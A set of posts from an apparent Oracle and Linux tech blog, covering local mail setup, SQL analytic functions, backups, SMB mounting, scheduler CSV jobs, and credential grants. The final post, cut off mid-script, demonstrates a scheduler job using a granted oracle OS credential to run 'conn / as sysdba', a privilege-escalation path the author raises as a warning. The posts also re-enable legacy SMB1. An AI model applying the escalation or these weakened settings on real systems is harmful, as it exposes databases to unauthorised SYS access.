As AI appears to be the “blockchain du jour” I thought I should make some attempt to appear up-to-date and relevant. Therefore, various AI entities from Ian M. Banks’ Culture will be making an appearance in what follows…

Software Versions

It’s probably useful to know the versions I’m using for this particular exercise :

  • Ubuntu 24.04.1 LTS
  • Thunderbird 128.10.0esr (64-bit)
  • Postfix 3.8.6
  • Dovecot 2.3.21
  • mailx 8.1.2

If you happen to have any of these installed already, you can check the version of Postfix by running…

postconf mail_version

…Dovecot by running..

dovecot --version

…and mailx by running :

mail -v

The Ubuntu version can be found under Settings/System/About

The Thunderbird version can be found under Help/About.

Before we get to installing or configuring anything, we need to…

Specify a domain for localhost

We need a domain for Postfix. As wer’re only flinging traffic around the current machine, it doesn’t have to be known to the wider world, but it does need to point to localhost.

So, in the Terminal :

sudo nano /etc/hosts

…and edit the line for 127.0.0.1 so it includes your chosen domain name.

Conventionally this is something like localhost.com, but “It’s My Party and I’ll Sing If I Want To”…

127.0.0.1 localhost culture.org

Once we’ve saved the file, we can test the new entry by running :

ping -c1 culture.org

PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.062 ms

--- localhost ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.062/0.062/0.062/0.000 ms
Install Dovecot

Simply install the package by running :

sudo apt-get install dovecot-imapd

The installation will complete automatically after which, in this instance, we don’t need to do any configuration at all.

Install and configure Postfix

You can install postfix by running :

sudo apt-get install postfix

As part of the installation you will be presented with a configuration menu screen :

Using the arrow keys, select Local Only then hit Return

In the next screen set the domain name to the one you setup in /etc/hosts ( in my case that’s culture.org ).

Hit Return and the package installation will complete.

Note that if you need to re-run this configuration you can do so by running :

dpkg-reconfigure postfix

Next we need to create a virtual alias map, which we do by running :

sudo nano /etc/postfix/virtual

and populating this new file with two lines that look like :

@localhost <your-os-user>
@domain.name <your-os-user>

In my case the lines in the file are :

@localhost mike
@culture.org mike

Now we need to tell Postfix to read this file so :

sudo nano /etc/postfix/main.cf

…and add this line at the bottom of the file :

virtual_alias_maps = hash:/etc/postfix/virtual

To activate the mapping :

sudo postmap /etc/postfix/virtual

…and restart the postfix service…

sudo systemctl restart postfix

Once that’s done, we can confirm that the postfix service is running :

sudo systemctl status postfix
Installing mailx

As with dovecot, we don’t need to do any more than install the package :

sudo apt-get install bsd-mailx
Testing the Configuration

Now we have mailx, we can test our configuration :

echo "While you were sleeping, I ran your backup for you. Your welcome" | mail -r sleeper.service@culture.org -s "Good Morning" mike@culture.org

To check if we’ve received the email, run :

cat /var/mail/mike

Actually having to cat the inbox seems a lot of effort.
If I’m going to be on the receiving end of condescending sarcasm from my own laptop I should at least be able to read it from the comfort of an email client.

Thunderbird

Currently, Thunderbird is the default mail client in Ubuntu and comes pre-installed.

If this is the first time you’ve run Thunderbird, you’ll be prompted to setup an account. If not then you can add an account by going to the “hamburger” menu in Thunderbird and selecting Account Settings. On the following screen click the Account Actions drop-down near the bottom of the screen and select Add Mail Account :

Fill in the details (the password is that of your os account) :

…and click Continue.

Thunderbird will now try and pick an appropriate configuration. After thinking about it for a bit it should come up with something like :

…which needs a bit of tweaking, so click the Configure Manually link and make the following changes :

Incoming Server Hostnamesmtp.localhostPort143Connection SecuritySTARTTLSAuthentication MethodNormal passwordUsernameyour os user (e.g. mike) Outgoing Server Hostnamesmtp.localhostPort25Connection SecuritySTARTTLSAuthentication MethodNormal passwordUsernameyour os user (e.g. mike )

If you now click the Re-test button, you should get this reassuring message :

If so, then click Done.

You will be prompted to add a security exemption for the Incoming SMTP server

Click Confirm Security Exception

NOTE – you may then get two pop-ups, one after the other, prompting you to sign in via google.com. Just dismiss them. This shouldn’t happen when you access your inbox via Thunderbird after this initial configuration session.

You should now see the inbox you’ve setup, complete with the message sent earlier :

You should also be able to read any mail sent to mike@localhost. To test this :

Incidentally, the first time you send a mail, you’ll get prompted to add a security exception for the Outgoing Mail server. Once again, just hit Confirm Security Exception.
Once you do this, you’ll get a message saying that sending the mail failed. Dismiss it and resend and it will work.
Once again, this is a first-time only issue.

After a few seconds, you’ll see the mail appear in the inbox :

As you’d expect, you can’t send mail to an external email address from this account with this configuration :

Sending an email from a Shell Script

The whole point of this exercise was so I could get emails from a shell script. To test this, I’ve created the following file – called funny_it_worked_last_time.sh

#!/bin/bash  
body=$'Disk Usage : \n'
space=$(df -h)
body+="$space"
body+=$'\nTime to tidy up, you messy organic entity!'
echo "$body" | mail -r me.im.counting@culture.org -s "Status Update" mike@culture.org

If I make this script executable and then run it :

chmod u+x funny_it_worked_last_time.sh

. ./funny_it_worked_last_time.sh

…something should be waiting for me in the inbox…

Further Reading

Part of the reason for writing this was because I couldn’t find one place where the instructions were still applicable on the latest versions of the software I used here.
The links I found most useful were :

Finally, for those of a geeky disposition, here’s a list of Culture space craft.

Fibonacci’s favourite IPL Team and the difference between ROW_NUMBER and RANK Analytic Functions

Mon, 2025-04-07 01:30

This post is really a note-to-self on the differences between the RANK and ROW_NUMBER analytic functions in Oracle SQL and why you don’t need to fiddle about with the order by clause of ROW_NUMBER to persuade it to generate unique values.
Now, I had planned to start by waxing lyrical about the simplicity inherent in that classic of Italian design, the Coffee Moka then segue into a demonstration of how these functions differ using the Fibonacci Sequence.

Despite it’s name, it turns out that the Fibonacci Sequence isn’t Italian at all, having actually originated in India.
As I’d already come up with the Fibonacci example, I’ll persist with it but, in a “deft and seamless pivot”, I’ll then use the IPL as the basis of further examples.
Full disclosure – the IPL team I follow is Sunrisers Hyderabad, a consequence of having worked with a native of that fair city ( hello Bhargav :)…

ROW_NUMBER vs RANK

As is traditional in posts on this topic, I’ll start by comparing the two functions.

Incidentally, I’ve used a recursive subquery to generate the sequence values ( based on this example ), as I’ll undoubtedly need to lay hands on one the next time I need to use this technique…

with fibonacci( rec_level, last_element, element)
as 
(
    -- Anchor member
    select 
        1 as rec_level,
        0 as last_element,
        1 as element
    from dual
    union all 
    -- Recursive member definition
    select 
        fib.rec_level + 1 as rec_level ,
        fib.element,
        fib.last_element + fib.element as next_element
    from fibonacci fib 
    where fib.rec_level <= 9
)
-- Execute the CTE
select element,
    rank() over( order by element) as rank,
    row_number() over( order by element) as row_number

from fibonacci 
order by rec_level
/

Run this and you get :

   ELEMENT       RANK ROW_NUMBER
---------- ---------- ----------
         1          1          1
         1          1          2
         2          3          3
         3          4          4
         5          5          5
         8          6          6
        13          7          7
        21          8          8
        34          9          9
        55         10         10

10 rows selected. 

In the second row, we can see how the output from each function differs. RANK will return the same value for rows that cannot be separated by the criteria in it’s order by clause wheras ROW_NUMBER will always return a unique value for each record.

Some Sensible Examples

We have the following table :

create table ipl_winners 
(
    year number(4) primary key,
    team varchar2(100)
)
/

insert into ipl_winners( year, team)
values( 2008, 'RAJASTHAN ROYALS');

insert into ipl_winners( year, team)
values(2009, 'DECCAN CHARGERS');

insert into ipl_winners( year, team)
values(2010, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2011, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2012, 'KOLKATA KNIGHT RIDERS');

insert into ipl_winners( year, team)
values(2013, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2014, 'KOLKATA KNIGHT RIDERS');

insert into ipl_winners( year, team)
values(2015, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2016, 'SUNRISERS HYDERABAD');

insert into ipl_winners( year, team)
values(2017, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2018, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2019, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2020, 'MUMBAI INDIANS');

insert into ipl_winners( year, team)
values(2021, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2022, 'GUJARAT TITANS');

insert into ipl_winners( year, team)
values(2023, 'CHENNAI SUPER KINGS');

insert into ipl_winners( year, team)
values(2024, 'KOLKATA KNIGHT RIDERS');

commit;

If we want to rank IPL Winning Teams by the number of titles won, then RANK() is perfect for the job :

with winners as 
(
    select 
    rank() over ( order by count(*) desc) as ranking,
    team, count(*) as titles
from ipl_winners 
group by team
)
select ranking, team, titles
from winners 
order by ranking, team
/
RANKING TEAM                               TITLES
---------- ------------------------------ ----------
         1 CHENNAI SUPER KINGS                     5
         1 MUMBAI INDIANS                          5
         3 KOLKATA KNIGHT RIDERS                   3
         4 DECCAN CHARGERS                         1
         4 GUJARAT TITANS                          1
         4 RAJASTHAN ROYALS                        1
         4 SUNRISERS HYDERABAD                     1

7 rows selected. 

For a listing of IPL winners ordered by the first year in which they won a title, ROW_NUMBER() is a better fit :

with first_title as 
(
    select team, year, 
        row_number() over ( partition by team order by year) as rn
    from ipl_winners
)
select team, year 
from first_title 
where rn = 1
order by year
/
TEAM                                 YEAR
------------------------------ ----------
RAJASTHAN ROYALS                     2008
DECCAN CHARGERS                      2009
CHENNAI SUPER KINGS                  2010
KOLKATA KNIGHT RIDERS                2012
MUMBAI INDIANS                       2013
SUNRISERS HYDERABAD                  2016
GUJARAT TITANS                       2022

7 rows selected. 

So far, that all seems quite straightforward, but what about…

Deduplicating with ROWID

I have seen ( and, I must confess, perpetrated) examples of RANK() being used for this purpose with ROWID being used as a “tie-breaker” to ensure uniqueness :

with champions as 
(
    select team,  
        rank() over ( partition by team order by team, rowid) as rn
    from ipl_winners
)
select team
from champions 
where rn = 1
/
TEAM
------------------------------
CHENNAI SUPER KINGS
DECCAN CHARGERS
GUJARAT TITANS
KOLKATA KNIGHT RIDERS
MUMBAI INDIANS
RAJASTHAN ROYALS
SUNRISERS HYDERABAD

7 rows selected. 

Whilst, on this occasion, we get the intended result, this query does have some issues.
For one thing, ROWID is not guaranteed to be a unique value, as explained in the documentation :

Usually, a rowid value uniquely identifies a row in the database. However, rows in different tables that are stored together in the same cluster can have the same rowid.

By contrast, ROW_NUMBER requires no such “tie-breaker” criteria and so is rather more reliable in this context :

with champions as 
(
    select team,  
        row_number() over ( partition by team order by team) as rn
    from ipl_winners
)
select team
from champions 
where rn = 1
/
TEAM
------------------------------
CHENNAI SUPER KINGS
DECCAN CHARGERS
GUJARAT TITANS
KOLKATA KNIGHT RIDERS
MUMBAI INDIANS
RAJASTHAN ROYALS
SUNRISERS HYDERABAD

7 rows selected. 
Relative Performance

A simple performance test did not reveal any major difference in the performance of each function.
I tested against a comparatively modest dataset ( 52K rows) on an OCI Free Tier 19c Database.
To mitigate any caching effect, each query was run twice in succession with the second runtime being recorded here.

The test code was :

create table functest as select * from all_objects;

--
-- Test RANK()
--

with obj as 
(
    select owner, object_name,
        rank() over ( partition by owner order by object_name, object_id) as rn
    from functest 
)
select owner, object_name 
from obj 
where rn = 1
order by 1;

--
-- Test ROW_NUMBER()
--

with obj as 
(
    select owner, object_name,
    -- only object_name required in the order by
    row_number() over ( partition by owner order by object_name, object_id) as rn
    from functest 
)
select owner, object_name 
from obj 
where rn = 1
order by 1;

For both test queries the fastest runtime was 0.048 seconds and 43 rows were returned.

Backing Up your Linux Desktop to Google Drive using Deja Dup on Ubuntu

Mon, 2025-02-24 01:30

Let’s face it, ensuring that you have regular backups of your home computer to a remote location can seem like a bit of a chore…right up to the time when you’ve managed to lose your data and need a fast and reliable way to get it back.
If you’re using Ubuntu, this task is made much easier by Deja Dup Backups.
Additionally, the cloud storage that comes free with mail accounts from most of the major tech companies can offer a reliable remote home for your backups until you need them. Handy when you don’t have a spare large-capacity thumb drive kicking around.

Using Ubuntu 24.04.02 LTS, what we’re going to look at here is :

  • Making your Google Drive accessible from the Ubuntu Gnome Desktop
  • Configuring Deja Dup to backup files to the Google Drive
  • Testing the backup
  • Scheduling backups to run regularly

For this purpose we’ll be using Ubuntu’s standard backup tool – Deja Dup ( listed as “Backups” if you need to search for it in the Gnome Application Menu).
We’ll also be making use of a Gmail account other than that used as the main account on an Android phone.
You may be relieved to know that we’ll be able to accomplish all of the above without opening a Terminal window ( well, not much anyway).

Accessing Google Drive from the Gnome Desktop

I’ve chosen to use a gmail account in this example because :

  • Google offers 15GB of free space compared to the 5GB you get with Microsoft or Apple
  • You don’t have to use the Google account you use for your Anrdoid phone so you don’t have to share the space with the phone data backups.

First you need to open Settings – either from the Gnome Application Menu, or from the Panel at the top of the screen – and select Online Accounts :

Now sign in with your Google account…

At this point you’ll be asked to specify what Gnome is allowed to access. In this case I’ve enabled everything :

If you now open Files on your computer, you should see your Google Drive listed :

In this case, I can also see that I have the full 15GB available :

Now we have a remote location to backup to, it’s time to figure out what to backup and how often…

Choosing what to Backup

OK, we’ve got some space, but it’s not unlimited so we want to take some care to ensure we backup only files we really need.
By default, the Backup tool will include everything under the current user’s $HOME apart from the Rubbish Bin and the Downloads folder :

Lurking under your $HOME are a number of hidden folders. In the main, these contain useful stuff such as application configuration ( e.g. web browser bookmarks etc). However, there may also be stuff that you really don’t need to keep hold of.

You remember what I said about not having to open a Terminal window ? Well, if you really want to know how big each of these directories is, You can just right-click each one in Files and then look at it’s properties. Alternatively, if you’re happy to open a Terminal Window, you can run :

du --max-depth=1 --human-readable $HOME |sort -hr

This will output the total size of $HOME followed by the total size of each immediate child directory in descending order :

In this case, I can see that the whole of my home is a mere 80M so I’m not going to worry about excluding anything else from the backup for the moment.
One final point to consider. By default, Deja Dup encrypts backup files using GPG (Gnu Privacy Guard), which will compress files as well as encrypting them. This means that the actual space required for the backup may be considerably less than the current size on disk.

Configuring the Backup

Before we start, we’re going to create a test file so that we can make sure that our backup is working once we’ve configured it.
I’ve created a file in $HOME/Documents...

…which contains…

Now look for “Backups” in the Gnome Application Menu :

Open the tool and click on Create Your First Backup :

Next, we need to select which folders to backup. As mentioned above, Deja Dup uses a reasonably sensible default :

You can add folders to both the Folders to Back Up and Folders to Ignore lists by clicking on the appropriate “+” button and entering either an absolute path, or a relative path from your $HOME.

Next, we need to specify the destination for the backup.
Looks like Deja Dup has been clever enough to detect our mapped Google Drive :

The destination folder name default to the name of the current machine.
When the backup runs, the folder will be created automatically if it doesn’t already exist.

When we click the Forward button, Deja Dup may well ask for the installation of additional packages :

…before asking for access to your Google account :

The next screen asks for an Encryption password for your backup. A couple of important points to note here are :

  1. Password protecting the backup is an outstandingly good idea. Whilst this screen does allow you to turn this off, I’d recommend against it – especially if the backup is being stored on a remote server.
  2. Whilst you can ask Deja Dup to remember the password so that you won’t need it if you need to restore files from a backup on the current system, the password is essential if you want to restore the backed up files on another system…or the current system after some major disaster renders your existing settings unavailable. MAKE SURE YOU REMEMBER IT.

When we click Forward, we should now be running our first backup :

Once the backup completes, we’ll have the option to schedule them at regular intervals. First though, let’s take a look at the files that have been created :

Let’s make sure that we can restore files from this backup.
Click on the Restore tab in Deja Dup…

… and you should be able to see all of the files in our backup, including the test file we created earlier :

If we navigate to the Documents folder we can select files to restore :

Click on Restore and select the location to restore to ( in this case, we’ll put it directly into $HOME ) :

Again, Click Restore and you’ll get a confirmation that your file is back :

…which we can confirm in Files :

Scheduling Backups

Deja Dup can perform backups automatically at a set interval.
In the Overview tab, select Back Up Automatically.

If you then open the “hamburger” menu and select Preferences, you get additional options, namely :

  • Automated Backup Frequency
  • Keep Backups

Once you’ve configured them, these backups will take place automatically on the schedule you’ve specified.

Accessing USB Storage attached to a Home Router from Ubuntu

Thu, 2025-01-09 01:30

New Year. New Me. Yes, I have made a resolution – setup a drive on my network to share files on.
What I really need for this is a shiny new NAS.
Unfortunately, my abstemous habits at this time of year are less to do with Dry January than they are with “Skint January”.
What I do have however, is a BT Smart Hub 2 Router, which has a usb slot in the back.
I also happen to have a reasonably large capacity thumb drive (128GB) which I found in the back of a drawer.
So, whilst I’m saving my pennies for that all-singing all-dancing NAS, I’m going to attempt to :

  • connect the thumb drive to my Router and share it on the network
  • access the drive as a network share with read-write permissions from my Ubuntu 22.04.5 LTS laptop

That sounds pretty simple, right ? Well, turns out that it is. Mostly…

To begin with, I’ve plugged the thumb drive into the Router, observing Shroedinger’s USB in action – any USB device will only be the right way up on the third try.

I can now see that the device is present in my Router Admin Page.

Now, theoretically at least, we should be able to access the USB from Ubuntu by opening Files ( Nautilus), clicking on Other Locations, and entering the following into the Connect to Server field at the bottom of the screen :

smb://192.168.1.254/usb1/

Unfortunately, we are likely to be met with :

"Failed to mount Windows Share. Software caused connection abort"

It appears that my super modern router uses and older version of Samba than Ubuntu.
Therefore, we need to change the Samba configuration on Ubuntu.
So, open a Terminal and…

sudo vi /etc/samba/smb.conf

There should be a line in this file that says something like :

workgroup = WORKGROUP

Directly below that line, we want to add :

client min protocol = NT1

…and save the file.

Now when we re-open Nautilus and try again, we should be able to see the USB.
You’ll probably be prompted to provide credentials, but just connect as an anonymous user.

Now we’ve established we can connect to the thumb drive, it would be nice to make things a bit more permanent. It would also be useful to ensure that we have read/write privileges on the files on the drive.

Before we do any config, we’ll need to make a note of the uid and gid of our Ubuntu user. By specifying these in the mount command, we can ensure we have full ownership of the files on the thumb drive.

To get these, once again, we need to be in the Terminal.

For the uid (user id) :

id -u

…and for the gid (group id) :

id -g

Now we can proceed with the configuration.

Still in the Terminal, we need to create a directory to serve as a mount point. For example :

sudo mkdir /media/sandisk_nas

Then we need to mount the drive itself. So…

sudo vi /etc/fstab

…and add this line after all the other mounts in the file (in this example, both the uid and gid are 9999) :

//192.168.1.254/usb1 /media/sandisk_nas cifs user,rw,guest,vers=1.0,uid=9999,gid=9999 0 0

We’ve specified “vers=1.0” in the options string to allow for the router running the older Samba version.

After saving the file, we can test by running :

sudo mount /media/sandisk_nas

Now we can see the drive in Nautilus, without having to mount it every time we startup :

The contents of the USB drive displayed in the Files application on Ubuntu

Finally to check that we have read and write permissions :

A Linux terminal window where we cd to the mount point we created and then echo "Cheapskate NAS" to a file called miketest.txt. We then cat the file to verify successful creation

Generating a CSV file with a SQL_SCRIPT Scheduler Job

Tue, 2024-12-03 01:00

Data Warehouse developers don’t ask for much really…a batch window sufficient to run their overnight batch in;
incoming files that conform to their specification; the ability to generate CSV files from a DBMS_SCHEDULER job without writing code that looks like a herd of zebras in a blizzard…

select '"'||emp.first_name||'","'||emp.last_name||'","'||j.job_title||'","'||d.department_name...

These days, there are numerous ways to accomplish this in Oracle, such as

What I’m going to look at here is a third option – using a SQL_SCRIPT scheduler job to take advantage of the formatting options available in SQL*Plus.

So, let’s leave those zebras in peace…

Environment and Setup

As with my previous post on this topic, I’m using a Virtualbox Oracle Developer Day Appliance running 19c database on Oracle Linux 7.6.
We will be running the scheduler job as the HR user.

To recap, the setup is as follows :

On the Server OS
sudo useradd -M hr_etl
sudo passwd hr_etl
On the Database

A credential for the HR_ETL user on the Operating System, which is granted to the HR database user :

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_ETL_OS_CREDENTIAL',
        username => 'hr_etl',
        password => 'Y3tanothercompl!catedpassword'
    );
end;
/

grant execute on hr_etl_os_credential to hr;

A credential for the HR database user itself :

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_DB_CREDENTIAL',
        username => 'hr@orcl',
        password => 'Mysupersecrethrpassw0rd!',
    );
end;
/
 
grant execute on hr_db_credential to hr;

Privileges to execute external jobs for the HR user :

grant create job, create external job to hr;
Additional OS Setup

This time, we’re going to need some directories to hold the report file we generate as well as a SQL script. These directories need to be accessible
to the OS user we’re connecting as to run the job ( HR_ETL).
In creating these directories, it would seem prudent to follow the practice of ensuring that HR_ETL ( and ultimately, any DB user with both access to the HR_ETL credential and CREATE DIRECTORY privileges) does not have write and execute access on any single directory.
Therefore, I’ll create the directories under the ownership of a different user and grant access to HR_ETL via the group.
In light of the shennanigans I got up to in the previous post, I’d suggest we don’t use oracle for this purpose. In this example, I’m using “mike”.

First, we’re going to create a group called ETL and assign hr_etl and mike to it :

sudo groupadd etl
sudo usermod -a -G etl hr_etl
sudo usermod -a -G etl mike

Next, we’ll create a directory structure to hold the relevant files :

mkdir /appdata
mkdir /appdata/output
mkdir /appdata/scripts

… and set etl to be the group…

sudo chgrp etl scripts
sudo chgrp etl output

Next, we’ll set the group permissions on the directories, including the sticky bit so any files inherit the permissions defined in the Access Control Lists that we’ll setup in a minute :

chmod g+s scripts
chmod g+s output
sudo chmod g+w output

chmod o-rwx output
chmod o-rwx scripts

The permissions on each directory now look like this :

drwxrws---. 1 mike etl  0 Dec  1 14:37 output
drwxr-s---+ 1 mike etl 48 Dec  1 12:02 scripts

So hr_etl has read and write permissions on OUTPUT an Read permissions on scripts thanks to it’s membership of the etl group.

Finally, we want to setup the Access Control Lists for the directories so that any files created in them will have the same permissions as those we’ve specified on the directory ( read write in OUTPUT and read only in SCRIPTS) :

setfacl -d -m g::r-- scripts
setfacl -d -m o::--- scripts
setfacl -d -m g::rw- output
setfacl -d -m o::--- output

To test :

touch /appdata/scripts/zebra.txt
ls -l /appdata/scripts/zebra.txt

-rw-r-----. 1 mike etl 0 Dec  1 14:55 /appdata/scripts/zebra.txt

touch /appdata/output/blizzard.txt
ls -l /appdata/output/blizzard.txt 
-rw-rw-r--. 1 mike etl 0 Dec  1 14:55 /appdata/output/blizzard.txt
File Specification

The file needs to be in standard CSV format ( values enclosed in quotes and separated by commas).
Each record in the file requires a label to specify the type of record it is. The value will be one of :

  • HEADER
  • DATA
  • TRAILER

The TRAILER record needs to be the last line in the file.
It needs to contain a timestamp for when the data was extracted and a count of the DATA rows in the file.

The filename needs to include the current date in it. The file format is :

employees_yyyymmdd.csv
The Report Query

We can fulfill a fair chunk of the file requirements in the report query itself.
To minimise the amount of code that I need to add to the finished job, and so that if (when) I need to do some investigation/debugging the query and it’s output are in easy reach, I’ve decided to create the report query as a view.

The clouds overhead seem to have miraculously cleared…

create or replace view employees_report_vw
as
    with rpt_data as
    (
        select 
            'DATA' as row_type,
            emp.first_name, 
            emp.last_name, 
            to_char(emp.hire_date, 'YYYY-MM-DD') as hire_date,
            j.job_title,
            d.department_name,
            count(*) over () as record_count -- total number of records returned - same value on every row
        from employees emp
        inner join jobs j
            on emp.job_id = j.job_id
        left outer join departments d
            on emp.department_id = d.department_id
    )
    select 
        row_type as header, -- row type of the header row.    
        first_name, 
        last_name, 
        hire_date, 
        job_title, 
        department_name
    from rpt_data
    union
    select 
        'TRAILER', 
        to_char(systimestamp, 'YYYYMMDDHH24MISS'),
        to_char(any_value(record_count)), 
        null, 
        null, 
        null
    from rpt_data
    order by 1 -- ensure the trailer record is output last
/

Querying the view we get :

Dynamically generating the filename

To accomplish this, we’re going to use the SQL*Plus NEW_VALUE column formatting command :

clear screen
column fdate new_value v_date noprint
set verify off
select to_char(sysdate, 'YYYYMMDD') as fdate from dual;

select 'employees_&v_date..csv' from dual;

'EMPLOYEES_20241201.CS
----------------------
employees_20241201.csv
Other SQL*Plus settings

We want to specify that the output is in CSV format, with attributes double-quoted and separated with a comma :

set markup csv on delimiter , quote on

We also want to make sure that the spool off command doesn’t get echoed to the file and that the query result doesn’t clutter up the OUTPUT column in USER_SCHEDULER_JOB_RUN_DETAILS :

set echo off
set termout off

There’s a bit of a snag here as the echo and termout system variables are only effective when a script is being called. Therefore, I’m going to save the finished script to a file and copy it to the scripts directory on the server which we created earlier.
The finished article is called employees_report_job.sql and looks like this :

column fdate new_value v_date noprint
set verify off
select to_char( sysdate, 'YYYYMMDD') as fdate from dual;

set feedback off
set echo off
set termout off
set markup csv on delimiter , quote on
spool /appdata/output/employees_&v_date..csv
select * from employees_report_vw;
spool off

The SQL_SCRIPT job

After all that, we can now setup and run the job from the comfort of the database…

set define off
declare
    v_job_name varchar2(30) := 'EMPLOYEES_REPORT_JOB';
begin
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => '@/appdata/scripts/employees_report_job.sql',
        credential_name => 'mike.hr_etl_os_credential',
        enabled => false
    );
    
    dbms_scheduler.set_attribute
    ( 
        name => v_job_name, 
        attribute => 'connect_credential_name',
        value => 'mike.hr_db_credential'
    );
    
    dbms_scheduler.enable(v_job_name);
end;
/

After running this we can check the job status :

select status, output
from user_scheduler_job_run_details
where job_name = 'EMPLOYEES_REPORT_JOB';

If we now check on the server, we can see that the file has been created in the output directory…

ls -l /appdata/output/employees_20241201.csv 
rw-rw-rw-. 1 hr_etl etl 7226 Dec  1 16:11  /appdata/output/employees_20241201.csv

Checking the file itself …

head /appdata/output/employees_20241201.csv 

"HEADER","FIRST_NAME","LAST_NAME","HIRE_DATE","JOB_TITLE","DEPARTMENT_NAME"
"DATA","Adam","Fripp","1997-04-10","Stock Manager","Shipping"
"DATA","Alana","Walsh","1998-04-24","Shipping Clerk","Shipping"
"DATA","Alberto","Errazuriz","1997-03-10","Sales Manager","Sales"
"DATA","Alexander","Hunold","1990-01-03","Programmer","IT"
"DATA","Alexander","Khoo","1995-05-18","Purchasing Clerk","Purchasing"
"DATA","Alexis","Bull","1997-02-20","Shipping Clerk","Shipping"
"DATA","Allan","McEwen","1996-08-01","Sales Representative","Sales"
"DATA","Alyssa","Hutton","1997-03-19","Sales Representative","Sales"

…and…

tail /appdata/output/employees_20241201.csv 

"DATA","TJ","Olson","1999-04-10","Stock Clerk","Shipping"
"DATA","Tayler","Fox","1998-01-24","Sales Representative","Sales"
"DATA","Timothy","Gates","1998-07-11","Shipping Clerk","Shipping"
"DATA","Trenna","Rajs","1995-10-17","Stock Clerk","Shipping"
"DATA","Valli","Pataballa","1998-02-05","Programmer","IT"
"DATA","Vance","Jones","1999-03-17","Shipping Clerk","Shipping"
"DATA","William","Gietz","1994-06-07","Public Accountant","Accounting"
"DATA","William","Smith","1999-02-23","Sales Representative","Sales"
"DATA","Winston","Taylor","1998-01-24","Shipping Clerk","Shipping"
"TRAILER","20241201161121","107",,,

That should keep everyone happy, including the zebras.

Setting up a Credential for use in SQL_SCRIPT jobs without using the Oracle os user

Mon, 2024-11-18 01:30

In a recent post, Connor McDonald showed how to setup and use the SQL_SCRIPT scheduler job type to run SQL*Plus directly from the database.
Connor’s example enabled this functionality for a specific individual ( SCOTT) who already knew the Oracle OS account’s password and was therefore able to create a credential based on that user.
But what if we want to incorporate scheduler executed SQL*Plus scripts into an application, rather than just making it available to an individual ?

Tweaking Connor’s example, I’m going to attempt to :

  • grant permissions on a credential to another user
  • use the connect_credential_name job attribute to avoid hard-coding passwords
  • explore the potential problem with using the oracle OS user as the object of a credential
  • set up a Linux account to base the credential on instead

The environment I’m using is an Oracle Developer Day VM running Oracle Enterprise Edition 19c on Oracle Linux 7.6.

Granting privileges on DBMS_CREDENTIAL credentials

Yes, Credentials are database objects, and as such are grantable. So, as a user with the CREATE CREDENTIAL privilege …

begin
    dbms_credential.create_credential
    (
        credential_name => 'ORACLE_OS_CREDENTIAL',
        username => 'oracle',
        password => 'ThisisownlyknowntotheDBAhon3st!'
    );
end;
/

grant execute on oracle_os_credential to hr;

We can also use a credential to connect to the database whilst in a SQL_SCRIPT job.
In this case, we need to include the database connect string in the username :

begin
    dbms_credential.create_credential
    (
        credential_name => 'HR_DB_CREDENTIAL',
        username => 'hr@orcl',
        password => 'Mysupersecrethrpassw0rd!',
    );
end;
/

grant execute on hr_db_credential to hr;

If the application we’re dealing with involves lots of batch jobs and file wrangling, the application owner schema may already have the required privileges. If not, then we would need to grant them :

grant create job, create external job to hr;

If we now connect as HR, we can see the credentials…

select owner, credential_name, username, enabled
from all_credentials
/

OWNER CREDENTIAL_NAME USERNAME ENABLED
--------------- ------------------------------ --------------- -----------
MIKE ORACLE_OS_CREDENTIAL oracle TRUE
MIKE HR_DB_CREDENTIAL hr@orcl TRUE

…as well as the privileges…

select privilege
from user_sys_privs
where privilege like '%JOB%';

PRIVILEGE                               
----------------------------------------
CREATE EXTERNAL JOB
CREATE JOB

Now HR can run a job to test the setup…

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB1';
    v_script varchar2(32767);
begin
    -- SQL*Plus statements included, but no connect string
    v_script := q'[
        column os_user format a20
        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
            sys_context('userenv', 'db_name') as db_name
        from dual;]';

    -- Jobs are created as DISABLED by default, so it won't run immediately...
    dbms_scheduler.create_job
    (
        job_name => v_job_name,
        job_type => 'SQL_SCRIPT',
        job_action => v_script,
        credential_name => 'mike.oracle_os_credential'
    );
    
    -- ...so we have a chance to add a credential to use to connect to the database
    dbms_scheduler.set_attribute
    ( 
        name => v_job_name, 
        attribute => 'connect_credential_name',
        value => 'mike.hr_db_credential'
    );
    
    -- now run the job
    dbms_scheduler.enable(v_job_name);
end;
/

After executing this job, we can see that the test was succesful :

select output
from user_scheduler_job_run_details
where job_name = 'HR_TEST_JOB1'
/       


OUTPUT                                                                                                                            
---------------------------------------------------------------

SQL*Plus: Release 19.0.0.0.0 - Production on Thu Nov 14 18:55:54 2024
Version 19.3.0.0.0

Copyright (c) 1982, 2019, Oracle.  All rights reserved.

SQL> Connected.
SQL> SQL> SQL> SQL> SQL>   2    3    4    5  
OS_USER 	     DB_USER		  DB_NAME   
-------------------- -------------------- --------------------
oracle		     HR 		  ORCL    

SQL> Disconnected from Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production
Version 19.3.0.0.0

However, there is something of a security issue with creating a credential on the oracle os user.

Would you like root with that ?

Whilst, in Connor’s example, the user created the credential themselves ( so presumably already “know” the oracle user OS password), that’s not the case here.

That means that we’ve effectively just given HR passwordless access to the database as SYS.

To demonstrate :

declare
    v_job_name varchar2(128) := 'HR_TEST_JOB2';
    v_script varchar2(32767);
begin
    -- No sys password ? No problem !
    v_script := q'[
        conn / as sysdba
        column os_user format a20
        column db_user format a20
        column db_name format a20
        select 
            sys_context('userenv', 'os_user') as os_user, 
            sys_context('userenv', 'current_user') as db_user,
